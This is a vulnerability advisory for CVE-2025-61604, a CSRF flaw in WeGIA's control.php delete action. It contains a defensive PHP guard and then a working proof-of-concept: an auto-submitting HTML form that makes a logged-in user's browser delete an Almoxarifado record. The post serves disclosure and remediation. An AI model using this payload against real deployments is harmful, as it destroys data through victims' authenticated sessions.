CVE-2025-61604

Cross-Site Request Forgery (CSRF)

CVE-2025-61604: Cross-Site Request Forgery (CSRF) Vulnerability in AlmoxarifadoControle class Delete (GET) on control.php Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-61604

Summary

A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. The delete operation for the Almoxarifado entity is exposed via HTTP GET without CSRF protection, allowing a third-party site to trigger the action using the victim’s authenticated session.
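The root cause described above is a state-changing action reachable through a plain GET with nothing that ties the request to the page the user was actually on. The guard below is an added example written for this post, not WeGIA's code: it shows what a dispatcher such as control.php could check before handing a mutating method like `excluir` to a controller class. The function names (`csrf_token`, `csrf_violation`) and the use of `$_SESSION['csrf_token']` are assumptions; only `metodo`, `excluir`, `nomeClasse` and `id_almoxarifado` come from the advisory.

```php
<?php
// Added example (not WeGIA's code): a guard a front controller could run
// before dispatching a state-changing method such as "excluir".
// Assumptions: the application has already started the session; the
// function names and the session key 'csrf_token' are hypothetical.

declare(strict_types=1);

// Issue (or reuse) a per-session token. Forms embed it as
// <input type="hidden" name="csrf_token" value="...">.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Returns null when the request may proceed, otherwise a short reason.
// Checks, in order: HTTP method, Fetch Metadata, and the session token.
function csrf_violation(array $server, array $post, array $session): ?string
{
    // 1. Mutating actions must not be reachable via GET at all. The PoC's
    //    auto-submitted GET form fails here and never reaches the controller.
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return 'method';
    }

    // 2. Browsers that send Sec-Fetch-Site reveal cross-site navigations
    //    even when SameSite=Lax cookies are attached. The header's absence
    //    (older browsers) is tolerated, so the token stays decisive.
    $site = $server['HTTP_SEC_FETCH_SITE'] ?? null;
    if ($site !== null && !in_array($site, ['same-origin', 'none'], true)) {
        return 'fetch-metadata';
    }

    // 3. The submitted token must match the one bound to this session,
    //    compared in constant time.
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return 'token';
    }

    return null;
}

// Dispatcher-side use. Only "excluir" is named by the advisory; a real
// deployment would list every method that writes to the database.
$mutatingMethods = ['excluir']; // hypothetical allow-list of state-changing methods
$metodo = $_REQUEST['metodo'] ?? '';

if (in_array($metodo, $mutatingMethods, true)) {
    $why = csrf_violation($_SERVER, $_POST, $_SESSION ?? []);
    if ($why !== null) {
        http_response_code($why === 'method' ? 405 : 403);
        error_log(sprintf('CSRF guard rejected %s %s (%s)',
            $_SERVER['REQUEST_METHOD'] ?? '?', $_SERVER['REQUEST_URI'] ?? '?', $why));
        exit;
    }
}
// ... normal dispatch to nomeClasse / metodo continues here
```

The method check alone would already stop the PoC on this page, because a cross-origin HTML form cannot be made to send a GET that the server treats as a POST. The token is what protects the POST variant of the same action, and the `error_log` line gives operators something to alert on: a burst of `method` or `fetch-metadata` rejections against `control.php` is the signature of exactly the attempt described in this advisory.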

PoC

Vulnerable Endpoint: GET /WeGIA/controle/control.php

Parameters: metodo, nomeClasse and id_almoxarifado

Top-Level Navigation (works even with SameSite=Lax)

Host the file below (e.g., as poc_csrf_get.html) on a different origin and open it while logged into WeGIA:

<!doctype html>
<html>
  <body>
    <form id="f" method="GET" action="https://sec.wegia.org:8000/WeGIA/controle/control.php" target="_self">
      <input type="hidden" name="metodo" value="excluir">
      <input type="hidden" name="nomeClasse" value="AlmoxarifadoControle">
      <input type="hidden" name="id_almoxarifado" value="{choose an ID}">
    </form>
    <script>document.getElementById('f').submit();</script>
  </body>
</html>

Steps to Reproduce:

  • Sign in to WeGIA with a user allowed to delete Almoxarifado.
  • From another origin (e.g., http://127.0.0.1:8008), open the PoC HTML above.
  • Observe WeGIA executing the delete flow (e.g., a foreign-key error or a successful delete), proving that a cross-site request can trigger the action.

Impact

  • Integrity compromise: Attackers can induce privileged users to perform destructive actions by visiting an attacker-controlled page.
  • Potential data loss or operational disruption if records not protected by foreign-key constraints are targeted.

Reference

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m

Finder

Marcelo Queiroz

By: CVE-Hunters
